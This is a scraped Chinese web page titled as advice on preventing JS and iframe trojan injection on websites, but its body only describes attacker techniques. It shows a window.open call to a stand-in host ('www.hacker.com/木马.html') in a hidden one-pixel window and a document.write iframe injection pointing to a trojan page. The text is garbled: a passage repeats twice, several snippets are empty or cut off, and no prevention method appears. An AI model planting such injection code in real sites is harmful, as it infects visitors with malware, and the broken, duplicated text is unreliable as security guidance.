您现在的位置是:网站首页> 编程资料编程资料
防止网站被JS,iframe挂马的防范方法_脚本攻防_网络安全_
2023-05-24
199人已围观
简介 防止网站被JS,iframe挂马的防范方法_脚本攻防_网络安全_
这种方法使用的关键代码如下:
window.open("http://www.hacker.com/木马.html","","toolbar=no,location=no,directories=no,status=no,menubar=no,scro llbars=no,width=1,height=1");
这种代码往往很长,很容易被安全工程师发现,而且没有经验的黑客也喜欢将“width”和“height=”参数设为“0”,但是设置为0后,可能会出现恶意代码不运行的情况。
另外一种JS挂马方式是,黑客先将挂马脚本代码“document.write('<Iframe src="网页木马地址" >
或者
document.write(" ")
就成功地将木马挂到了对方的网页中了。
小提示:黑客还可以根据情况随机变换插入的JS挂马方法,例如黑客有可能会将脚本写为:
或者:
window.open("http://www.hacker.com/木马.html","","toolbar=no,location=no,directories=no,status=no,menubar=no,scro llbars=no,width=1,height=1");
这种代码往往很长,很容易被安全工程师发现,而且没有经验的黑客也喜欢将“width”和“height=”参数设为“0”,但是设置为0后,可能会出现恶意代码不运行的情况。
另外一种JS挂马方式是,黑客先将挂马脚本代码“document.write('<Iframe src="网页木马地址" >
或者
document.write(" ")
就成功地将木马挂到了对方的网页中了。
小提示:黑客还可以根据情况随机变换插入的JS挂马方法,例如黑客有可能会将脚本写为:
或者:
相关内容
- 脚本入侵-上传漏洞总结篇(臭小子)_脚本攻防_网络安全_
- 脚本入侵 ASP网站入侵常用的一些技巧分享_脚本攻防_网络安全_
- 脚本入侵 入侵ewebeditor编辑器一些技巧_脚本攻防_网络安全_
- PHP 双字节、宽字节编码漏洞_脚本攻防_网络安全_
- PHP+MySQL手工注入语句大全 MySQL手工注入语句总结_脚本攻防_网络安全_
- PHP Mysql 密码暴力破解代码,本机暴力破解 3306 端口_脚本攻防_网络安全_
- 设置.net1.1 .net2.0安全 防止iisspy 防止aspx木马等_脚本攻防_网络安全_
- MSSQL 2005 入侵提权过程分享_脚本攻防_网络安全_
- BOSSI 公司企业网站管理系统注入&上传漏洞利用_脚本攻防_网络安全_
- mysql注入导库脚本代码_脚本攻防_网络安全_
点击排行
本栏推荐
